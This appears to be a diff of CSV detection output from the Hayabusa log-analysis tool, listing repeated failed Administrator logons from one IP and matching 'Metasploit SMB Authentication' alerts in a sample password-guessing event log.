+2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BWQDlZDgFj9NmMhJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ncQiyLyHCXr8knGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XjVmLfmcPMYbmdin  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gU2HjzjDxHsnvENI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cUPn5CEz2LtwRwvZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCz069oBFXqpshbU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dzhc9PVRVP69tshD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ejA3ZNfKWEs8zAMX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U5egiL2PGOrYCHv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YYhIM3zla6KcbKbM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WjyQJnVBO4iC9Tkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g6Tpp8TRa2nRxHzo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DyLvo5Bn2HzyANdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NaXNThuZDGqJ7oCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 42Sb7p19cQsEV30b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: An6629wgflzSgqY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iO7JktEihqddmEtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nG97BFOgKxnZaqi4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SH2D24c6nRGDL4Oe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uiu2yfaM2JQQZoLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YQx9PG8DtR2tMjvS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OoAWryajKhLD7RyY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PgewSeaVugP1TXss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sPMCPdCAnz4upz8X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dUbV6xnGeBWE8Dif  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIJ9mZczFO1GKItV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wW0vxE4o68L70Sra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: upOn9DzB1yWtntyX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m9uGgocAVReiJWDm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qm9Jf1fles2HOb3g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ev5eTWdf3CskOMuh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QoiMO6sSLOm4fOD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xDjvMsa2IgR9KO7l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SR7gVjxHZDYeK7pJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4jzGAepr7JeNKuuk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H9baxEeRCWjx6Fzr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uy7aTt0B4ErguacA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nvKcLrUXqu2vTKO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PLycXLeAU21pdnXL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SgwjJSKOPnurDWW4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YPDYdxPoQAl8aGMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CX8knunlT6SMpmQw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AAjYbt50leZt3Xve  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3CD0HUCdg4UWOiji  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dkeWmTE1R1rYaYP8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W87qcfSj4qWWUv4k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
